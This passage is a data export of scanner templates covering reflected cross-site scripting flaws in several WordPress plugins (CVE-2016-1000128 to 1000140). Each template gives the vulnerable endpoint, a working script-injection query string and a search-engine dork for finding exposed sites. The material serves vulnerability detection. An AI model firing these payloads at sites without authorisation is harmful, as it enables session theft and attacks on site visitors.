Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting.\n remediation: |\n Update the WordPress anti-plagiarism plugin to version >3.60 or apply the latest security patches provided by the vendor.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=161\n - https://wordpress.org/plugins/anti-plagiarism\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000128\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000128\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.41115\n cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: anti-plagiarism_project\n product: anti-plagiarism\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/anti-plagiarism\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'anti plagiarism'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f3239ff972161e24aca8bf71e1f1521d3187bb86c523eeb72a2ea2e0aa08a12c02201d0977e00530389a5ddfa4b4e5c336e60dc52c7b4ac6659d003a508bd7111e24:922c64590222798bb761d5b6d8e72950", "hash": "0d83e9d59d52d2ef122dfa9a4b88a45c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f76" }, "name": "CVE-2016-1000129.yaml", "content": "id: CVE-2016-1000129\n\ninfo:\n name: WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress defa-online-image-protector 3.3 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress defa-online-image-protector plugin (version 3.3 or higher) to mitigate this vulnerability.\n reference:\n - https://wordpress.org/plugins/defa-online-image-protector\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=449\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000129\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.4505\n cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: defa-online-image-protector_project\n product: defa-online-image-protector\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/defa-online-image-protector\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,defa-online-image-protector_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Defa Online Image Protector'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e11b59590fb5e11215513513bfc35c13cc2cb35612d4bf738fb8920c6bc688ee02206c93ea212aeb8f613a8d78e7130372b903b1e884981e05ab41b34c8da05bb1bf:922c64590222798bb761d5b6d8e72950", "hash": "baf604730c06cf1e4074703d9730de47", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f77" }, "name": "CVE-2016-1000130.yaml", "content": "id: CVE-2016-1000130\n\ninfo:\n name: WordPress e-search <=1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.\n reference:\n - https://wordpress.org/plugins/e-search\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=394\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000130\n cwe-id: CWE-79\n epss-score: 0.00093\n epss-percentile: 0.38905\n cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: e-search_project\n product: e-search\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/e-search\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Search'\n - 'Tags:'\n - 'Tested up to:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bd7768054ea7d2cdaaa293c8dbd3650c0e844a1f7d00a9d9e1c2de7c22668228022100910936c4c4bb62052f5aa9f885dd0e3cf525b1bb615175b2c1b0a703b55fcf07:922c64590222798bb761d5b6d8e72950", "hash": "824991bf47dae859f24793f05ca7f413", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f78" }, "name": "CVE-2016-1000131.yaml", "content": "id: CVE-2016-1000131\n\ninfo:\n name: WordPress e-search <=1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress e-search 1.0 and before contains a reflected cross-site scripting vulnerability via title_az.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=393\n - https://wordpress.org/plugins/e-search\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000131\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.40457\n cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: e-search_project\n product: esearch\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/e-search\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Search'\n - 'Tags:'\n - 'Tested up to:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220407a865ce50567b9cfec98ff87801912e6a450a0cc7cb90608a2bcefb09326e2022100fa66ee427289bd34d36b90328ed3dd597de4413ef0023d1b1b6f5ff54f0bd5f1:922c64590222798bb761d5b6d8e72950", "hash": "450d02fb6f1d04576ebbe3fbccf1c3a4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f79" }, "name": "CVE-2016-1000132.yaml", "content": "id: CVE-2016-1000132\n\ninfo:\n name: WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=37\n - https://wordpress.org/plugins/enhanced-tooltipglossary\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000132\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44389\n cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: cminds\n product: tooltip_glossary\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/enhanced-tooltipglossary\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,cminds\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'CM Tooltip Glossary'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022056b01771211e3c34ab1cee5a82de7389cedd20ce4d5a4a1ce19b3b20bbb86293022002f2fac47b84c364827d0040101b36a98b508648776caa202680e8b449340920:922c64590222798bb761d5b6d8e72950", "hash": "2423673bae4091e10d53d079c0347f1a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7a" }, "name": "CVE-2016-1000133.yaml", "content": "id: CVE-2016-1000133\n\ninfo:\n name: WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Wordpress plugin forget-about-shortcode-buttons 1.1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress forget-about-shortcode-buttons plugin (1.1.1) or apply the necessary patches.\n reference:\n - https://wordpress.org/plugins/forget-about-shortcode-buttons\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=602\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000133\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.48963\n cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: designsandcode\n product: forget_about_shortcode_buttons\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/forget-about-shortcode-buttons\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,designsandcode\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Forget About Shortcode Buttons ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f92c4af7bff7cdc26614302a343a2e292a63ffc3dc760a557d3dc5522c84de2a02205c0c45f3fce04749913d9d7e88fb5392529bd0a5afaff6cee77e413325bd531f:922c64590222798bb761d5b6d8e72950", "hash": "c4f7d85e3fed07144e66d631a26455f5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7b" }, "name": "CVE-2016-1000134.yaml", "content": "id: CVE-2016-1000134\n\ninfo:\n name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=530\n - https://wordpress.org/plugins/hdw-tube\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000134\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.41177\n cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: hdw-tube_project\n product: hdw-tube\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/hdw-tube\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'HDW WordPress Video Gallery'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009e1f0521838c2885e1b261ccf9f75e7d5fce03c68143774e5c51d9e2ec04aa460221008d6d8821f9f324f964566338a04fdee2e0db95cfa34c8efef2fbe87ea3366457:922c64590222798bb761d5b6d8e72950", "hash": "87a21cbb0879b8fba597ee5e019e9a1f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7c" }, "name": "CVE-2016-1000135.yaml", "content": "id: CVE-2016-1000135\n\ninfo:\n name: WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=533\n - https://wordpress.org/plugins/hdw-tube\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000135\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.40457\n cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: hdw-tube_project\n product: hdw-tube\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/hdw-tube\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,hdw-tube_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'HDW WordPress Video Gallery'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fe47bbf2d6b77cbaf7c14f4d4c3fdec3fa4f8e7760ecc729a6d6cebdb8b912890221009014c68b01c8342e2958cfefd2d4e86dea48acac20d8b8ee693e0f7f07884097:922c64590222798bb761d5b6d8e72950", "hash": "e739a6e80a67b59d1abb3c94dfadb20d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7d" }, "name": "CVE-2016-1000136.yaml", "content": "id: CVE-2016-1000136\n\ninfo:\n name: WordPress heat-trackr 1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: |\n Upgrade to the latest version of WordPress heat-trackr or apply the provided patch to fix the XSS vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=798\n - https://wordpress.org/plugins/heat-trackr\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000136\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45775\n cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: heat-trackr_project\n product: heat-trackr\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/heat-trackr\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/heat-trackr/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008266c058f77b0bcce7d5c3840b1de017c2f9c9dcf29b4c25de3da0795616b617022051947c2820e443c04fae4fe4b80fc5d8b3c585f6fcd746499351570a80791f3c:922c64590222798bb761d5b6d8e72950", "hash": "c1fe868cdd90b4be37f09605bd9c217d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7e" }, "name": "CVE-2016-1000137.yaml", "content": "id: CVE-2016-1000137\n\ninfo:\n name: WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of WordPress Hero Maps Pro plugin (2.1.1 or higher) which includes a fix for this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=658\n - https://wordpress.org/plugins/hero-maps-pro\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000137\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.40457\n cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: hero-maps-pro_project\n product: hero-maps-pro\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Hero Maps Pro ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ca078885ee89701b0101c68c31266741248f0cd91d17638c44938f0ecc86fc99022100eeb3152a54e3fc1c80a725aa1880ad8ac60b32cc41a7f52f9b9f05f9b96e21c1:922c64590222798bb761d5b6d8e72950", "hash": "eb856726a13c3a03e4a0e5a65bdc1652", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7f" }, "name": "CVE-2016-1000138.yaml", "content": "id: CVE-2016-1000138\n\ninfo:\n name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=38\n - https://wordpress.org/plugins/indexisto\n - http://web.archive.org/web/20210622181116/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000138\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000138\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45775\n cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: indexisto_project\n product: indexisto\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/indexisto\"\n tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '= Indexisto'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201f497916921501b875878ceba1666d2f55f9f59aa773a30aeb759dbd9ff49d05022015296c72674c1a9c191771b6e5c5d9e61676c016ac61ea6c0aec7b45e2249bcd:922c64590222798bb761d5b6d8e72950", "hash": "17e5e26514938ac2a813054c63a0e5b4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f80" }, "name": "CVE-2016-1000139.yaml", "content": "id: CVE-2016-1000139\n\ninfo:\n name: WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the Infusionsoft Gravity Forms plugin (>=1.5.12) which includes a fix for this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a\n - https://wordpress.org/plugins/infusionsoft\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=864\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000139\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44389\n cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: infusionsoft_project\n product: infusionsoft\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/infusionsoft\"\n tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Infusionsoft'\n - 'Tags:'\n condition: and\n case-insensitive: true\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"><\"'\n - 'input type=\"text\" name=\"ContactId\"'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e07437f284d69ad7b1e86b00b90017f487a6ca63ba0bb1f5107015a7f85ecc600220153bd6ae71159dd9826db4aa229bbc07e303d5655b6d567aae3fb89c45e8bc26:922c64590222798bb761d5b6d8e72950", "hash": "947ad4d85f70b4af2f12661931cb230b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f81" }, "name": "CVE-2016-1000140.yaml", "content": "id: CVE-2016-1000140\n\ninfo:\n name: WordPress New Year Firework <=1.1.9 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials 